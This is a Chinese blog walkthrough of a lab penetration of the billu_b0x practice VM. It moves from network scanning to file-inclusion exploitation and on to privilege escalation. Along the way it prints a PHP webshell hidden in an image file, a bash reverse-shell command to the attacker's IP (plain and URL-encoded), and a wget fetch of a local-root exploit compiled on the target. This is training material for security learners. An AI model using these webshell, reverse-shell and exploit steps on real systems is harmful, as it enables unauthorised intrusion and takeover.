靶机渗透【billu_b0x】

最新推荐文章于 2024-03-06 16:13:17 发布
最新推荐文章于 2024-03-06 16:13:17 发布
阅读量7.3k 收藏 26
点赞数 11
分类专栏: 靶机渗透 文章标签: web安全 linux 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52576844/article/details/122405136
版权

文章目录

一. billu_b0x 靶机安装

1. 靶机下载

  • 百度网盘链接提取码

billu_b0x.rar
提取码:8whr

2. 开启靶机

  • 打开 VMware,在左上角选择 - - 文件 - - 打开
    在这里插入图片描述

  • 找到 billu_b0x 靶机解压位置
    在这里插入图片描述

  • 开启后如图所示
    在这里插入图片描述

二. billu_b0x 靶机渗透

  • 开启一台 Kali
    Kali(IP):192.168.110.151

若未安装 Kali 可点击此处进行安装
虚拟机安装【Kali】(2018/2021)

1. 信息收集

1)扫描 IP

arp-scan -l

发现目标 IP:192.168.110.154
在这里插入图片描述
2)扫描端口

masscan --rate=10000 --ports 0-65535 192.168.110.154

发现目标开启 80,22端口
在这里插入图片描述
3)扫描服务

nmap -T4 -sV -O -p 80,22 192.168.110.154

发现目标开启 http,ssh服务
在这里插入图片描述
4)扫描域名目录

Kali下带有一些网站后台目录的字典,为了更好的信息收集,我们选择附带字典

dirb http://192.168.110.154 /usr/share/wordlists/dirb/big.txt

在这里插入图片描述

2. Web渗透

拿到网站目录后,我们进行一一查看登录

1)http://192.168.110.154
在这里插入图片描述

  • 发现登录点,且提示 " Show me your SQLI skills ",我们尝试 SQL 注入,使用万能密码admin' and '1'='1

在这里插入图片描述
在这里插入图片描述

  • 登录后显示如上提示,注入失败,更换目录

2)http://192.168.110.154/in
在这里插入图片描述

  • 发现 php 配置文件,疑似存在文件包含漏洞

在这里插入图片描述
3)http://192.168.110.154/add
在这里插入图片描述

  • 发现疑似文件上传点,尝试上传后无反应,更换目录

4)http://192.168.110.154/test
在这里插入图片描述

  • 发现此页面可传参 file,但 file 为空,出现 file 疑似存在文件包含,于是我们直接在链接后跟包含

在这里插入图片描述

  • 无法包含,可能 GET 传参不行,抓包修改使用 POST 传参

在这里插入图片描述
在这里插入图片描述

  • 任意包含文件,包含成功

在这里插入图片描述

  • 发现此漏洞,我们找到目录的其他子域名进行查看,最终在c.php下发现了疑似数据库用户名密码及库名

在这里插入图片描述

  • 在 panel.php 中发现了以POST形式传参的文件包含

在这里插入图片描述
4)http://192.168.110.154/phpmy/
在这里插入图片描述

  • 发现数据库,尝试用已知信息登录,登录成功

用户名:billu
密码:b0x_billu

在这里插入图片描述

  • 先前发现信息中含有 ica_lab 库名,进入查看,最终在 auth 中发现用户名密码

在这里插入图片描述

  • 回到最初登录点 http://192.168.110.154 登录

5)http://192.168.110.154/panel.php
在这里插入图片描述

  • 登录成功,来到先前发现存在文件包含的网页 panel.php,在Add User选项中发现图片文件上传点,想到上传图片马

6)http://192.168.110.154/uploaded_images/
在这里插入图片描述

  • 找到先前发现的图片下载站,随意拿下一张图片,命名为 1.jpg

在这里插入图片描述

3. 反弹shell

写下一句话木马,命名为 2.asp

<?php system($_POST[cmd]);?>
在这里插入图片描述

制作图片马

  • 本机打开cmd,切换到 1.jpg 和 2.asp 文件目录下,制作图片马

copy 1.jpg/b+2.asp/a 3.jpg
在这里插入图片描述

回到上传点,上传图片马,上传成功

在这里插入图片描述

使用 BP 抓包,点击 continue,拿到如下数据包,扔到 Repeater

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

看到 load =show 想起先前在此网页发现的以POST形式传参的文件包含如下图,load正是参数值,修改参数值,试探能否执行

在这里插入图片描述
在这里插入图片描述

发现执行成功,下一步准备用 bash 反弹 shell

  • 中间 IP 为 Kali IP,设置一个端口

echo "bash -i >& /dev/tcp/192.168.110.151/5555 0>&1" | bash

  • 此时注意,应先进行 url 编码,打开编码工具,同时 Kali 打开监听

nc -vnlp 5555

在这里插入图片描述
%65%63%68%6F%20%22%62%61%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%31%31%30%2E%31%35%31%2F%35%35%35%35%20%30%3E%26%31%22%20%7C%20%62%61%73%68
在这里插入图片描述

将转码复制在 cmd= 后,反弹 shell

在这里插入图片描述

回到 Kali ,发现成功拿到 shell

在这里插入图片描述

4. 提权

拿到 shell 后,发现只是普通用户,接下来进行提权

1)查看当前版本

cat /etc/issue
在这里插入图片描述
Ubuntu 12.04

2)打开新的终端,使用 Kali 的漏洞扫描库

searchsploit Ubuntu 12.04

在这里插入图片描述
37292.c

3)拿下 37292.c 放到自己的网站根目录下

cd /usr/share/exploitdb/exploits/linux/local
cp 37292.c /var/www/html
在这里插入图片描述
4)开启 Apache 服务

/etc/init.d/apache2 start
在这里插入图片描述
5)回到 shell,因为权限不够,所以切换到临时目录,使用 wget 下载

cd /tmp
wget http://192.168.110.151/37292.c
在这里插入图片描述
6)编译执行

gcc 37292.c -o abc
./abc
在这里插入图片描述
7)提权

python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述

‍‍‪‍pinkward
关注
  • 11
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7729
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
Billu_b0x靶场渗透测试
qq_41567985的博客
11-05 146
总结一下今天的打靶,这个靶场有很多漏洞可以利用,但是我也只是利用了一两个,中间反弹shell那里花了挺多时间的,但是也有提升,让我学到了很多种反弹shell的方法!使用了很多提权命令都不是很行,也在里面使用了wget发现还是不行,后面才查到没有权限需要去/tmp目录下。确实啊,tmp目录本来就容易被忽视,777的权限,这个应该要好好的完善一下权限才行。把限免load改成上传的php文件改成jpg文件之后的名字-send-并且反弹成功。始终反弹不成功,按照网上的方法也都试了试,还是不成功,不是很明白。
靶机练习-1:billu_b0X
yifujiadeng的博客
01-12 1131
靶机练习-1:billu_b0X 环境准备: Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址 kali linux 2020虚拟机,ip地址192.168.1.137 渗透步骤: 信息收集: 1.ip发现 nmap -sP 192.168.1.0/24 使用nmap扫描本网段主机,其中192.168.1.1为网卡地址,192.168.1.3为网关,137为本机地址, 目标靶机ip为192.168.1.132 或者使用命令arp-scan -l扫描,效果相同,且不扫描本机
Vulnhub靶机Billu_b0x
最新发布
qq_48904485的博客
03-06 714
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Billu_b0x(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip。
靶机渗透(二)——Billu_b0x
qq_45751902的博客
04-18 1944
一、环境配置 kali:192.168.92.5 nat模式 靶机:192.168.92.3 nat模式 二、信息收集 1.扫描ip nmap -sP 192.168.92.0/24 2.端口扫描 半开扫描:nmap -sS 192.168.92.3 全开扫描:nmap -sT 192.168.92.3 3个过程全部完成叫全开扫描,最后一步不做,叫半开扫描。在实际过程中,半开扫描应用的最多,半开扫描不容易被目标电脑日志记录。 3.目录扫描 dirb http://192.168.92.3
billu_b0x靶场通关
tpaer的博客
03-03 716
billu_box靶场通关
Billu_b0x
PromisingQ
04-01 3429
完整过程 开启虚拟机用kali扫了半天没扫到,还以为环境有问题…最后发现是网络模式设置的仅主机…改成net以后,nmap -sP 192.168.144.1/24 nmap -p 1-655535 -sV 192.168.144.144 访问80端口 很明显登录框,尝试SQL注入,直接上最高等级,不过还是未果sqlmap -r post.txt --level=5 --risk=3 然后就扫一下目录呗, (字典太大,而且有重复,扫了一个小时,需要优化…) 经过筛选,发现5个可疑的地址: http://
vulnhub靶场,Billu_b0x
kukudeshuo的博客
07-21 707
vulnhub靶场,Billu_b0x 环境准备 靶机下载地址:https://www.vulnhub.com/entry/billu-b0x,188/ 攻击机:kali(192.168.58.130) 靶机Billu_b0x(192.168.58.159) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 ...
一次Billu_b0x渗透学习
nini_boom的博客
10-16 1320
一次Billu_b0x渗透学习 这次的Billu_b0x靶场应该说是学习经验,按照大神的流程走了一遍,中间各种扫盲,和学习思路,现在把整体的思路和过程梳理一下。 一、发现IP 虚拟机打开,按照规则所说,NAT模式,没有发现IP 于是ifconfig,找到vmnet8的C段,这里就是虚拟机存在的网段。 nmap -sP 172.16.230.1/24 nmap -sP 是扫描这个C段对pin...
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
靶机CH4INRULZ_V1练习报告1
08-08
靶机CH4INRULZ_V1练习报告1
Billu_b0x靶机实验实战演练
lianliandad的博客
11-12 995
好好学习
Billu_b0x 靶机
m0_60945802的博客
04-18 2119
靶机Billu_b0x
OWASP靶机下载安装详细过程
热门推荐
xxx_Python的博客
05-22 2万+
OWASP靶机下载安装详细过程一、 OWASP靶机下载二、 VM虚拟机三、 OWASP安装四、 OWASP启动运行 一、 OWASP靶机下载 下载地址:https://sourceforge.net/projects/owaspbwa/files/. 一般可直接点击“Download Latest Version”下载最新版本的OWASP靶机 二、 VM虚拟机 安装可自行上网查看安装教程,本次使用VM15pro 三、 OWASP安装 保证磁盘容量有10G左右或以上,解压下载的OWASP压缩包 打开VM虚
VnlnHub Billu_b0x
weixin_45682839的博客
10-09 375
涉及知识包括:端口服务探测、敏感目录收集、SQL注入、文件上传漏洞、任意文件包含漏洞、linux本地提权、任意文件下载漏洞、敏感信息收集等。
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的工具和技术: 1. Nmap:用于端口扫描和服务识别。 2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要根据具体情况进行选择和使用。此外,还需要注意法律和道德问题,不要进行未经授权的渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

‍‍‪‍pinkward

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值